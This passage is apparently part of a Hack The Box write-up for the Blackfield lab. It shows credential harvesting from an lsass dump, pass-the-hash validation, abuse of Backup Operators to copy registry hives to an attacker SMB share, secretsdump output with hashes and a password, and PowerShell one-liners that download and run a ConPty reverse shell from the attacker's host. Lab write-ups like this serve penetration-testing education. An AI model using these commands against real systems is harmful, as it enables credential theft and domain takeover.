The `lsass.zip` caught my eye. We might be able to extract credentials from the process memory of `lsass.exe`:

```console
# cd ../memory_analysis
# get lsass.zip
```

It was nearly 40 MB and took a while to download.  
After unzipping, [pypykatz](https://github.com/skelsec/pypykatz) can be used to harvest credentials from this memory dump:

```console
opcode@debian$ unzip lsass.zip
opcode@debian$ pypykatz lsa minidump lsass.DMP
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
    == MSV ==
        Username: svc_backup
        Domain: BLACKFIELD
        LM: NA
        NT: 9658d1d1dcd9250115e2205d9f48400d
        SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
        DPAPI: a03cd8e9d30171f3cfe8caad92fef621
    == WDIGEST [633ba]==
        username svc_backup
        domainname BLACKFIELD
        password None
        password (hex)
    == Kerberos ==
        Username: svc_backup
        Domain: BLACKFIELD.LOCAL
    == WDIGEST [633ba]==
        username svc_backup
        domainname BLACKFIELD
        password None
        password (hex)

== LogonSession ==
authentication_id 365835 (5950b)
session_id 2
username UMFD-2
domainname Font Driver Host
logon_server 
logon_time 2020-02-23T17:59:38.218491+00:00
sid S-1-5-96-0-2
luid 365835
    == MSV ==
        Username: DC01$
        Domain: BLACKFIELD
        LM: NA
        NT: b624dc83a27cc29da11d9bf25efea796
        SHA1: 4f2a203784d655bb3eda54ebe0cfdabe93d4a37d
        DPAPI: NA
[--SNIP--]
== LogonSession ==
authentication_id 153705 (25869)
session_id 1
username Administrator
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T17:59:04.506080+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-500
luid 153705
    == MSV ==
        Username: Administrator
        Domain: BLACKFIELD
        LM: NA
        NT: 7f1e4ff8c6a8e6b6fcae2d9c0572cd62
        SHA1: db5c89a961644f0978b4b69a4d2a2239d7886368
        DPAPI: 240339f898b6ac4ce3f34702e4a89550
[--SNIP--]
```

Let us validate those NThashes:

```console
root@e3affd1de9c1:~# nxc smb 10.10.10.192 -d BLACKFIELD.local -u 'Administrator' -H '7f1e4ff8c6a8e6b6fcae2d9c0572cd62'
SMB         10.10.10.192  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192  445    DC01             [-] BLACKFIELD.local\Administrator:7f1e4ff8c6a8e6b6fcae2d9c0572cd62 STATUS_LOGON_FAILURE 

root@e3affd1de9c1:~# nxc smb 10.10.10.192 -d BLACKFIELD.local -u 'DC01$' -H 'b624dc83a27cc29da11d9bf25efea796'
SMB         10.10.10.192  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192  445    DC01             [-] BLACKFIELD.local\DC01$:b624dc83a27cc29da11d9bf25efea796 STATUS_LOGON_FAILURE 

root@e3affd1de9c1:~# nxc smb 10.10.10.192 -d BLACKFIELD.local -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d'
SMB         10.10.10.192  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB         10.10.10.192  445    DC01             [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d 
```

Only the NThash for `svc_backup` is valid.  
Since `svc_backup` is a member of `Remote Management Users` group, it can obtain a WinRM shell:

```console
root@e3affd1de9c1:~# nxc winrm 10.10.10.192 -d BLACKFIELD.local -u 'svc_backup' -H '9658d1d1dcd9250115e2205d9f48400d' -X 'IEX(IWR http://10.10.14.52:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.52 9001'
```

## Abusing `Backup Operators` group

```console
PS C:\> whoami /all

USER INFORMATION
----------------

User Name             SID
===================== ==============================================
blackfield\svc_backup S-1-5-21-4194615774-2175524697-3563712290-1413


GROUP INFORMATION
-----------------

Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288        



PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.   
```

`svc_backup` is a Backup Operator, which grants it `SeBackupPrivilege` and `SeRestorePrivilege`.  
I've shown multiple approaches to abuse the `Backup Operators` group in my [Cicada write-up](https://gitlab.com/0pcode/htb-scribbles/-/blob/main/Boxes/Cicada/README.md).  
Please refer to it for alternate approaches.

I'd use the remote SAM and LSA dump approach on this machine.  
I started an SMB server on my VM:

```console
opcode@debian$ smbserver.py -smb2support crate `pwd`
```

And tried dumping the `SAM`, `SYSTEM` and `SECURITY` registry hives:

```console
opcode@debian$ reg.py BLACKFIELD.local/svc_backup@DC01.BLACKFIELD.local -hashes :9658d1d1dcd9250115e2205d9f48400d save -keyName 'HKLM\SAM' -o '\\10.10.14.52\crate'
Impacket v0.13.0.dev0+20241206.82610.e9a47ffc - Copyright Fortra, LLC and its affiliated companies 

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SAM to \\10.10.14.52\crate\SAM.save

opcode@debian$ reg.py BLACKFIELD.local/svc_backup@DC01.BLACKFIELD.local -hashes :9658d1d1dcd9250115e2205d9f48400d save -keyName 'HKLM\SECURITY' -o '\\10.10.14.52\crate'
Impacket v0.13.0.dev0+20241206.82610.e9a47ffc - Copyright Fortra, LLC and its affiliated companies 

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SECURITY to \\10.10.14.52\crate\SECURITY.save

opcode@debian$ reg.py BLACKFIELD.local/svc_backup@DC01.BLACKFIELD.local -hashes :9658d1d1dcd9250115e2205d9f48400d save -keyName 'HKLM\SYSTEM' -o '\\10.10.14.52\crate'
Impacket v0.13.0.dev0+20241206.82610.e9a47ffc - Copyright Fortra, LLC and its affiliated companies 

[!] Cannot check RemoteRegistry status. Triggering start trough named pipe...
[*] Saved HKLM\SECURITY to \\10.10.14.52\crate\SYSTEM.save
```

`secretsdump.py` can be used to obtain SAM and LSA secrets:

```console
opcode@debian$ secretsdump.py -sam SAM.save -security SECURITY.save -system SYSTEM.save LOCAL 
Impacket v0.13.0.dev0+20241206.82610.e9a47ffc - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:67ef902eae0d740df6257f273de75051:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:11045906df36af4b3d20c68991a91bd33352b34997a5f0760b2523eb376f5a5c11fcfa7a778dd09ebe6902263a30d510ea21becad2a15deaa6611d77345847c1ecaab71953517047549d097a5777d05fda7168fd7d70e3a949f909eec73bdcb693d861a39669105d22c0abf5d077e58186e52e9b6d9cf0b73c4361cf9f9114c54122b0f2d26cecebc7096ca5c6510d4c1cf33a9b7079658aee40f84d5626d12dd41fb1f90a0a609bb3c230c6c5d8ec2e5ae4e2b5adb70d2aa1422e63c05c17bebdcddde95bea67bb0017d99a8ed2085163005a6187ecd25a877de25c8136ef67002328065b72de29f45016baacfa2c01
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:8170a55e0f44ed5c7cf22e042f9ac5db
[*] DefaultPassword 
(Unknown User):###_ADM1N_3920_###
[*] DPAPI_SYSTEM 
dpapi_machinekey:0xd4834e39bca0e657235935730c045b1b9934f690
dpapi_userkey:0x9fa187c3b866f3a77c651559633e2e120bc8ef6f
[*] NL$KM 
 0000   88 01 B2 05 DB 70 7A 0F  EF 52 DF 06 96 76 4C A4   .....pz..R...vL.
 0010   BD 6E 62 D1 06 63 1A 7E  31 2F A2 6D F8 6C 42 50   .nb..c.~1/.m.lBP
 0020   FC 8D 5C A4 FC 46 1B DC  7E CA 7E 76 7F 5E C2 74   ..\..F..~.~v.^.t
 0030   CF EB B6 1F 99 8A 29 CF  2C D1 1D 55 C6 01 2E 6F   ......).,..U...o
NL$KM:8801b205db707a0fef52df0696764ca4bd6e62d106631a7e312fa26df86c4250fc8d5ca4fc461bdc7eca7e767f5ec274cfebb61f998a29cf2cd11d55c6012e6f
[*] Cleaning up... 
```

The SAM and LSA secrets get resolved to local credentials, which are invalid on the domain.  
Still, the NThash for `$MACHINE.ACC` corresponds to the Domain Controller and is valid on the domain. It can be used for DCsync:

```console
opcode@debian$ secretsdump.py BLACKFIELD.local/'DC01$'@DC01.BLACKFIELD.local -hashes :8170a55e0f44ed5c7cf22e042f9ac5db -just-dc
```

However, it fails because the higher RPC ports needed for DRSUAPI are firewalled. We can forward them using ligolo-ng or other tools.  
But it is not necessary as `secretsdump.py` had also discovered a default password for WinLogon:

```text
###_ADM1N_3920_###
```

It is the domain administrator's password. Therefore, we can obtain a WinRM shell:

```console
root@e3affd1de9c1:~# nxc winrm 10.10.10.192 -d BLACKFIELD.local -u 'Administrator' -p '###_ADM1N_3920_###' -X 'IEX(IWR http://10.10.14.52:8000/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.10.14.52 9001'
```

```console
PS C:\Windows\system32> whoami
blackfield\administrator
```
